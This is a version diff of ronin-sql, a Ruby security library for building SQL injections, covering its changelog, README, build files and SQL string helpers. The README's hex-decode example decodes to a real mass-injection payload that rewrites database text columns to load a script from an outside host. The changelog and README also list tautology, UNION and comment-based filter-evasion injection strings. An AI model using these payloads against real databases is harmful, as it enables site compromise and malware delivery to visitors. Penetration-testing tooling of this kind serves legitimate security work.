ronin-sql 0.2.4 → 1.0.0

data/{History.txt → ChangeLog.md}

@@ -1,4 +1,22 @@
-=== 0.2.4 / 2009-09-24
+### 1.0.0 / 2013-01-21
+
+* Require [Ruby] >= 1.9.1.
+* No longer require ronin.
+* No longer require ronin-web.
+* Added {String#sql_unescape}.
+* Moved {String#sql_escape}, {String#sql_encode} and {String#sql_decode}
+  from [ronin-support].
+* Refactored the {Ronin::SQL SQL} DSL to be more like
+  [ARel](https://github.com/rails/arel#readme).
+  * Moved the DSL from `Ronin::Code::SQL` into {Ronin::SQL}.
+* Removed `Ronin::SQL::Error`.
+* Removed `String#sql_error`.
+* Removed `String#sql_error?`.
+* Removed `URI::HTTP.has_sql_errors?`.
+* Removed `URI::HTTP.sql_error`.
+* Removed `URI::HTTP.sql_errors`.
+
+### 0.2.4 / 2009-09-24
 
 * Require ronin >= 0.3.0.
 * Require ronin-web >= 0.2.0.
@@ -9,7 +27,7 @@
 * Fixed a formatting issue in the README.txt file, which was causing RDoc
   to crash.
 
-=== 0.2.3 / 2009-07-02
+### 0.2.3 / 2009-07-02
 
 * Use Hoe >= 2.0.0.
 * Require ronin >= 0.2.4.
@@ -18,18 +36,18 @@
   Ronin::SQL::Injection objects for URI::HTTP urls.
 * Added more specs.
 
-=== 0.2.2 / 2009-01-22
+### 0.2.2 / 2009-01-22
 
 * Depend on the new ronin-web library.
 * Replace Hpricot with Nokogiri.
 * Use the new Ronin::Web::Spider, instead of directly using Spidr.
 * Use the new Nokogiri extensions from ronin-web.
 
-=== 0.2.1 / 2009-01-09
+### 0.2.1 / 2009-01-09
 
 * Added missing files to the Manifest.
 
-=== 0.2.0 / 2009-01-08
+### 0.2.0 / 2009-01-08
 
 * Require Ronin >= 0.1.3.
 * Refactored Ronin::Code::SQL.
@@ -38,48 +56,28 @@
   * Support common SQL clauses.
   * Allow for injecting arbitrary SQL clauses.
   * Added more SQL Injection test generators.
-    * all_rows:
-
-         OR 1 = 1
-
-    * exact_rows:
-
-         AND 1 = 1
-
-    * no_rows:
-
-         AND 1 = 0
-
-    * has_column?(column):
-
-         OR column IS NOT NULL
-
-    * has_table?(table):
-
-         AND (SELECT FROM table count(*) == 1)
-
-    * uses_column?(column):
-
-         GROUP BY column HAVING 1 = 1
-
-    * uses_table?(table):
-
-         OR table IS NOT NULL
-
+    * all_rows: `OR 1 = 1`
+    * exact_rows: `AND 1 = 1`
+    * no_rows: `AND 1 = 0`
+    * has_column?(column): `OR column IS NOT NULL`
+    * has_table?(table): `AND (SELECT FROM table count(*) == 1)`
+    * uses_column?(column): `GROUP BY column HAVING 1 = 1`
+    * uses_table?(table): `OR table IS NOT NULL`
 * Removed references to Ronin::Vulnerable.
 * Added more specs:
   * Specs for most of Ronin::Code::SQL.
   * Specs on Ronin::SQL::Error and the SQL encoding/decoding extensions for
     the String class.
 
-=== 0.1.1 / 2008-09-28
+### 0.1.1 / 2008-09-28
 
 * Trivial bug fix to URI::HTTP#sql_errors.
 
-=== 0.1.0 / 2007-12-23
+### 0.1.0 / 2007-12-23
 
 * Initial release.
 * Supports SQL code generation.
 * Supports obfustication of SQL code.
 * Supports SQL Injection code generation.
 
+[Ruby]: http://www.ruby-lang.org/

data/Gemfile

@@ -0,0 +1,25 @@
+source 'https://rubygems.org'
+
+RONIN_URI  = 'http://github.com/ronin-ruby'
+
+gemspec
+
+gem 'jruby-openssl',	'~> 0.7', :platforms => :jruby
+
+# Ronin dependencies:
+# gem 'ronin-support',  '~> 0.6',   :git => "#{RONIN_URI}/ronin-support.git"
+# gem 'ronin',          '~> 1.5.0', :git => "#{RONIN_URI}/ronin.git"
+
+group :development do
+  gem 'rake',         '~> 10.0'
+  gem 'kramdown',     '~> 0.12'
+
+  gem 'ripl',              '~> 0.3'
+  gem 'ripl-multi_line',   '~> 0.2'
+  gem 'ripl-auto_indent',  '~> 0.1'
+  gem 'ripl-short_errors', '~> 0.1'
+  gem 'ripl-color_result', '~> 0.3'
+
+  gem 'rubygems-tasks', '~> 0.1'
+  gem 'rspec',          '~> 2.4'
+end

data/README.md

@@ -0,0 +1,110 @@
+# Ronin SQL
+
+* [Source](https://github.com/ronin-ruby/ronin-sql)
+* [Issues](https://github.com/ronin-ruby/ronin-sql/issues)
+* [Documentation](http://rubydoc.info/github/ronin-ruby/ronin-sql/frames)
+* [Mailing List](https://groups.google.com/group/ronin-ruby)
+* [irc.freenode.net #ronin](http://webchat.freenode.net/?channels=ronin&uio=Mj10cnVldd)
+
+## Description
+
+{Ronin::SQL} is a Ruby DSL for crafting SQL Injections (SQLi).
+
+### Features
+
+* Provides convenience methods for encoding/decoding SQL data.
+* Provides an Domain Specific Language (DSL) for crafting normal SQL and
+  SQL injections.
+
+## Examples
+
+### Convenience Methods
+
+Escape a String:
+
+    "O'Brian".sql_escape
+    # => "'O''Brian'"
+
+Unescapes a SQL String:
+
+    "'O''Brian'".sql_unescape
+    # => "O'Briand"
+
+Hex encode a String:
+
+    "exploit".sql_encode
+    # => "0x6578706c6f6974"
+
+Hex decode a String:
+
+    string = "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
+    string.sql_decode
+    # => "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''+['+@C+'] where '+@C+' not like ''%\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
+
+### SQLi DSL
+
+Injecting a `1=1` test into a String value:
+
+    sqli = Ronin::SQL::Injection.new(:escape => :string)
+    sqli.or { string(1) == string(1) }
+    puts sqli
+    # 1' OR '1'='1
+
+Columns:
+
+    sqli = Ronin::SQL::Injection.new
+    sqli.and { admin == 1 }
+    puts sqli
+    # 1 AND admin=1
+
+Clauses:
+
+    sqli = Ronin::SQL::Injection.new
+    sqli.or { 1 == 1 }.limit(0)
+    puts sqli
+    # 1 AND admin=1
+
+Statements:
+
+    sqli = Ronin::SQL::Injection.new
+    sqli.union { select(1,2,3,4,id).from(users) }
+    puts sqli
+    # 1 UNION SELECT (1,2,3,4,id) FROM users
+
+Filter evasion:
+
+    sqli = Ronin::SQL::Injection.new
+    sqli.union { select(1,2,3,4,id).from(users) }
+    puts sqli.to_sql(:space => '/**/')
+    # 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users
+
+## Requirements
+
+* [Ruby] >= 1.9.1
+
+## Install
+
+    $ gem install ronin-sql
+
+## License
+
+Ronin SQL - A Ruby DSL for crafting SQL Injections.
+
+Copyright (c) 2007-2013 Hal Brodigan (postmodern.mod3 at gmail.com)
+
+This file is part of Ronin SQL.
+
+Ronin Asm is free software: you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+
+Ronin Asm is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with Ronin Asm.  If not, see <http://www.gnu.org/licenses/>.
+
+[Ruby]: http://www.ruby-lang.org

data/Rakefile

@@ -1,26 +1,36 @@
-# -*- ruby -*-
-
 require 'rubygems'
-require 'hoe'
-require 'hoe/signing'
-require './tasks/spec.rb'
-require './tasks/yard.rb'
 
-Hoe.spec('ronin-sql') do
-  self.rubyforge_name = 'ronin'
-  self.developer('Postmodern','postmodern.mod3@gmail.com')
-  self.remote_rdoc_dir = 'docs/ronin-sql'
-  self.extra_deps = [
-    ['ronin', '>=0.3.0'],
-    ['ronin-web', '>=0.2.0']
-  ]
+begin
+  require 'bundler'
+rescue LoadError => e
+  warn e.message
+  warn "Run `gem install bundler` to install Bundler."
+  exit e.status_code
+end
 
-  self.extra_dev_deps = [
-    ['rspec', '>=1.2.8'],
-    ['yard', '>=0.2.3.5']
-  ]
+begin
+  Bundler.setup(:development)
+rescue Bundler::BundlerError => e
+  warn e.message
+  warn "Run `bundle install` to install missing gems"
+  exit e.status_code
+end
+
+require 'rake'
 
-  self.spec_extras = {:has_rdoc => 'yard'}
+require 'rubygems/tasks'
+Gem::Tasks.new(:sign => {:checksum => true, :pgp => true}) do |tasks|
+  tasks.console.command = 'ripl'
+  tasks.console.options = %w[
+    -rripl/multi_line
+    -rripl/auto_indent
+    -rripl/color_result
+  ]
 end
 
-# vim: syntax=Ruby
+require 'rspec/core/rake_task'
+RSpec::Core::RakeTask.new
+task :default => :spec
+
+require 'yard'
+YARD::Rake::YardocTask.new

data/bin/ronin-sql

@@ -2,13 +2,26 @@
 
 require 'rubygems'
 
-lib_dir = File.expand_path(File.join(File.dirname(__FILE__),'..','lib'))
-unless $LOAD_PATH.include?(lib_dir)
-  $LOAD_PATH << lib_dir
+root_dir = File.expand_path(File.join(File.dirname(__FILE__),'..'))
+if File.directory?(File.join(root_dir,'.git'))
+  Dir.chdir(root_dir) do |path|
+    require 'bundler'
+
+    begin
+      Bundler.setup(:default)
+    rescue Bundler::BundlerError => e
+      STDERR.puts e.message
+      STDERR.puts "Run `bundle install` to install missing gems"
+      exit e.status_code
+    end
+  end
 end
 
-require 'ronin/ui/command_line/commands/console'
+lib_dir = File.join(root_dir,'lib')
+$LOAD_PATH << lib_dir unless $LOAD_PATH.include?(lib_dir)
+
 require 'ronin/ui/console'
+require 'ronin/ui/command_line/commands/console'
 
 Ronin::UI::Console.auto_load << 'ronin/sql'
-Ronin::UI::CommandLine::Commands::Console.start
+Ronin::UI::CLI::Commands::Console.start

data/gemspec.yml

@@ -0,0 +1,16 @@
+name: ronin-sql
+summary: A Ruby DSL for crafting SQL Injections.
+description:
+  Ronin SQL is a a Ruby DSL for crafting SQL Injections.
+
+license: GPL-3
+authors: Postmodern
+email: postmodern.mod3@gmail.com
+homepage: https://github.com/ronin-ruby/ronin-sql
+has_yard: true
+
+required_ruby_version: ">= 1.9.1"
+
+development_dependencies:
+  bundler: ~> 1.0
+  yard: ~> 0.8

data/lib/ronin/formatting/extensions/sql.rb

@@ -1,8 +1,9 @@
 #
-# Ronin SQL - A Ronin library providing support for SQL related security
-# tasks.
+# Ronin SQL - A Ruby DSL for crafting SQL Injections.
 #
-# Copyright (c) 2007-2009 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2013 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This file is part of Ronin SQL.
 #
 # This program is free software; you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by

data/lib/ronin/formatting/extensions/sql/string.rb

@@ -1,8 +1,9 @@
 #
-# Ronin SQL - A Ronin library providing support for SQL related security
-# tasks.
+# Ronin SQL - A Ruby DSL for crafting SQL Injections.
 #
-# Copyright (c) 2007-2009 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2013 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This file is part of Ronin SQL.
 #
 # This program is free software; you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
@@ -21,12 +22,77 @@
 
 class String
 
+  #
+  # Escapes an String for SQL.
+  #
+  # @param [:single, :double, :tick] quotes (:single)
+  #   Specifies whether to create a single or double quoted string.
+  #
+  # @return [String]
+  #   The escaped String.
+  #
+  # @raise [TypeError]
+  #   The quotes argument was neither `:single`, `:double` nor `:tick`.
+  #
+  # @example
+  #   "O'Brian".sql_escape
+  #   # => "'O''Brian'"
+  #
+  # @example Encode with double-quotes:
+  #   "O'Brian".sql_escape(:double)
+  #   # => "\"O'Brian\""
+  #
+  # @api public
+  #
+  def sql_escape(quotes=:single)
+    char = case quotes
+           when :single then "'"
+           when :double then '"'
+           when :tick   then '`'
+           else
+             raise(ArgumentError,"invalid quoting style #{quotes.inspect}")
+           end
+
+    return char + gsub(char,char * 2) + char
+  end
+
+  #
+  # Unescapes a SQL String.
+  #
+  # @return [String]
+  #   The unescaped String.
+  #
+  # @raise
+  #   The String was not quoted with single, double or tick-mark quotes.
+  #
+  # @example
+  #   "'O''Brian'".sql_unescape
+  #   # => "O'Brian"
+  #
+  # @api public
+  #
+  # @since 1.0.0
+  #
+  def sql_unescape
+    char = if    (self[0] == "'" && self[-1] == "'") then "'"
+           elsif (self[0] == '"' && self[-1] == '"') then '"'
+           elsif (self[0] == '`' && self[-1] == '`') then '`'
+           else
+             raise(TypeError,"#{self.inspect} is not properly quoted")
+           end
+
+    return self[1..-2].gsub(char * 2,char)
+  end
+
   #
   # Returns the SQL hex-string encoded form of the String.
   #
+  # @example
   #   "/etc/passwd".sql_encode
   #   # => "0x2f6574632f706173737764"
   #
+  # @api public
+  #
   def sql_encode
     return '' if empty?
 
@@ -42,25 +108,32 @@ class String
   #
   # Returns the SQL decoded form of the String.
   #
+  # @example
   #   "'Conan O''Brian'".sql_decode
   #   # => "Conan O'Brian"
   #
-  #  "0x2f6574632f706173737764".sql_decode
+  # @example
+  #  "2f6574632f706173737764".sql_decode
   #  # => "/etc/passwd"
   #
+  # @raise
+  #   The String is neither hex encoded or SQL escaped.
+  #
+  # @see #sql_unescape
+  #
+  # @api public
+  #
   def sql_decode
-    if ((self[0...2] == '0x') && (length % 2 == 0))
+    if (self =~ /^[0-9a-fA-F]{2,}$/ && (length % 2 == 0))
       raw = ''
 
-      self[2..-1].scan(/[0-9a-fA-F]{2}/).each do |hex_char|
-        raw << hex_char.hex.chr
+      scan(/../) do |hex_char|
+        raw << hex_char.to_i(16)
       end
 
       return raw
-    elsif (self[0..0] == "'" && self[-1..-1] == "'")
-      self[1..-2].gsub(/\\'/,"'").gsub(/''/,"'")
     else
-      return self
+      sql_unescape
     end
   end